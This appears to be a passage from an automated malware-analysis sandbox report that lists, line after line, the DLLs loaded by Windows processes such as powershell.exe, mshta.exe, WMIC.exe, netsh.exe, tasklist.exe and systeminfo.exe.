              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll
              Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\attrib.exe Section loaded: ulib.dll
              Source: C:\Windows\SysWOW64\attrib.exe Section loaded: fsutilext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: msxml6.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vcruntime140.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\wbem\WMIC.exe Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\tree.com Section loaded: ulib.dll
              Source: C:\Windows\SysWOW64\tree.com Section loaded: fsutilext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: peerdistsh.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wcmapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rmclient.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mobilenetworking.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: slc.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: sppc.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ktmw32.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprmsg.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\netsh.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\systeminfo.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
